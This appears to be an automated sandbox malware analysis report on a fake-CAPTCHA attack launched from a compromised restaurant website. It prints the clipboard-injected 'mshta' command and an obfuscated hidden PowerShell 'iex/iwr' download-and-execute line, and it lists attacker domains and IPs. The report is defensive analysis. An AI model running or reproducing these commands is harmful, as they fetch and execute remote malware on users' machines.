Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000016.00000002.2002117152.0000021C5BF75000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000016.00000002.2002617898.0000021C5C184000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softy.pdbt source: powershell.exe, 00000016.00000002.2002117152.0000021C5BF75000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb"K'yG source: powershell.exe, 00000016.00000002.2002117152.0000021C5BF75000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000016.00000002.2002117152.0000021C5BFC0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000016.00000002.2002617898.0000021C5C184000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb. source: powershell.exe, 00000016.00000002.2002617898.0000021C5C1B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb* source: powershell.exe, 00000016.00000002.2002617898.0000021C5C184000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbf3856ad364e35 source: powershell.exe, 00000016.00000002.2002617898.0000021C5C1B7000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

PowerShell case anomaly found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHeLl /w h /c "iex (iw"r" ht"tp:/"/xoiias"dpsd"oas"dp"o"ja"s.com)"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHeLl /w h /c "iex (iw"r" ht"tp:/"/xoiias"dpsd"oas"dp"o"ja"s.com)"			Jump to behavior

Persistence and Installation Behavior

HTML page adds supicious text to clipboard

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Clipboard modification: mshta http://141.0x62.80.175/rtdx.dat

Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiDebug via timestamp check

Source: Yara match

File source: 0.12.do.script.csv, type: HTML

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4819			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4168			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4700	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1836	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6796	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3140	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: mshta.exe, 00000015.00000003.1941804849.00000214A7A83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000015.00000002.1973546647.00000214A7A9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000015.00000003.1941804849.00000214A7AD7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000015.00000003.1941804849.00000214A7A4C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2002617898.0000021C5C170000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHeLl /w h /c "iex (iw"r" ht"tp:/"/xoiias"dpsd"oas"dp"o"ja"s.com)"

Jump to behavior

Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.3324.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.3324.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.3324.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.3324.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.3324.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.3324.cat VolumeInformation	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 PowerShell	1 Browser Extensions	11 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	12 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Name	IP	Active	Malicious	Reputation
tdsworkout.com	103.136.68.61	true	false	high
a.nel.cloudflare.com	35.190.80.1	true	false	high
getfix.win	178.16.53.137	true	false	high
whos.amung.us	172.66.172.247	true	false	high
de.tynt.com	67.202.105.31	true	false	high
t.dtscout.com	172.67.70.180	true	false	high
cdn.tynt.com.cdn.cloudflare.net	104.18.13.146	true	false	high
thefatshallot.com	192.124.249.3	true	false	high
cptchdm.icu	94.154.35.152	true	false	high
xpoalswwkjddsljsy.com	193.24.211.233	true	false	high
youtube-ui.l.google.com	142.250.178.206	true	false	high
xoiiasdpsdoasdpojas.com	141.98.80.175	true	false	unknown
2no.co	172.67.149.76	true	false	high
www.google.com	142.250.178.228	true	false	high
api.ipify.org	172.67.74.152	true	false	high
ic.tynt.com	67.202.105.32	true	false	high
cdn.tynt.com	unknown	unknown	false	high
www.youtube.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
http://xoiiasdpsdoasdpojas.com/	false	unknown
https://getfix.win/jsrepo?rnd=0.3805456465715724&ts=1760683897314	false	unknown
https://cptchdm.icu/?ref=thefatshallot.com	false	unknown
http://141.98.80.175/rtdx.dat	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://player.vimeo.com/api/player.js	chromecache_168.1.dr	false	high
https://thefatshallot.com/wp-content/themes/jupiter/assets/images/selectbox-arrow.png	chromecache_189.1.dr	true	unknown
http://xoiiasdpsdoasdpojas.com)	powershell.exe, 00000016.00000002.1989928575.0000021C42050000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1990110470.0000021C42110000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://thefatshallot.com/wp-content/cache/min/1/wp-content/themes/jupiter/header-builder/includes/a	chromecache_189.1.dr	true	unknown
https://fatshallotorders.square.site/	chromecache_189.1.dr	false	unknown
https://www.cloudflare.com/?utm_source=challenge&utm_campaign=m	chromecache_148.1.dr	false	high
http://141.98.80.175/rtdx.dat-1-0	mshta.exe, 00000015.00000002.1973367618.00000214A7A1E000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://ordering.chownow.com/order/20536/locations/55614	chromecache_189.1.dr	false	high
https://thefatshallot.com/wp-content/uploads/2018/04/logo21.png	chromecache_189.1.dr	true	unknown
https://voicemod.net/ltc/tx/050a4783d56adcd7da1a2dca470cc39ebc21dbfbb3344abcadd53f3dccc11fda/	chromecache_148.1.dr	false	high
https://www.youtube.com	chromecache_189.1.dr	false	high
https://thefatshallot.com/wp-content/cache/min/1/wp-content/themes/jupiter/assets/js/core-scripts.6.	chromecache_189.1.dr	true	unknown
https://thefatshallot.com/story/press/	chromecache_189.1.dr	true	unknown
https://fast.fonts.net/jsapi	chromecache_158.1.dr	false	high
https://thefatshallot.com/revival-food-hall-menu/	chromecache_189.1.dr	true	unknown
http://141.0x62.80.175/rtdx.datH	mshta.exe, 00000015.00000002.1973215792.00000214A79C0000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000016.00000002.2000250119.0000021C53A83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2000250119.0000021C53BC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1990241947.0000021C45404000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.themepunch.com/support-center	chromecache_175.1.dr	false	unknown
https://thefatshallot.com/catering-and-events/	chromecache_189.1.dr	true	unknown
https://thefatshallot.com/wp-content/uploads/2024/09/503a7540-1.jpg	chromecache_189.1.dr	true	unknown
https://www.youtube.com/embed/7WY5eJ2A_3k?feature=oembed	chromecache_189.1.dr	false	high
http://ns.attribution.com/ads/1.0/	chromecache_171.1.dr, chromecache_195.1.dr	false	high
http://141.0x62.80.175/rtdx.datQ	mshta.exe, 00000015.00000002.1973367618.00000214A7A1E000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://www.youtube.com/embed/ZmAIZd098o8?feature=oembed	chromecache_189.1.dr	false	high
https://ordering.chownow.com/order/20536/locations?add_cn_ordering_class=true	chromecache_189.1.dr	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000016.00000002.1990241947.0000021C43A21000.00000004.00000800.00020000.00000000.sdmp	false	high
https://thefatshallot.com/wp-content/uploads/2025/04/fat-shallot-sterling-menu-spring-2025.pdf	chromecache_189.1.dr	true	unknown
https://thefatshallot.com/#breadcrumb	chromecache_189.1.dr	true	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000016.00000002.1990241947.0000021C43C4C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000016.00000002.1990241947.0000021C43C4C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://thefatshallot.com/wp-content/uploads/2013/01/logo1.png	chromecache_189.1.dr	true	unknown
https://schema.org/VideoObject	chromecache_189.1.dr	false	high
https://contoso.com/Icon	powershell.exe, 00000016.00000002.1990241947.0000021C45404000.00000004.00000800.00020000.00000000.sdmp	false	high
https://sterlingfoodhall.menu/ordernow?menu=70dff0fc-5bba-4b68-b587-a5fca0b4fa20	chromecache_189.1.dr	false	unknown
https://www.cloudflare.com/products/turnstile/?utm_source=turnstile&utm_campaign=widget	chromecache_155.1.dr, chromecache_203.1.dr	false	high
https://thefatshallot.com/schedule	chromecache_189.1.dr	true	unknown
https://schema.org	chromecache_189.1.dr	false	high
https://thefatshallot.com/page/glory-casino-online-games/index.html	chromecache_189.1.dr	true	unknown
https://github.com/Pester/Pester	powershell.exe, 00000016.00000002.1990241947.0000021C43C4C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://thefatshallot.com/wp-content/plugins/wp-rocket/assets/img/youtube.png	chromecache_189.1.dr	true	unknown
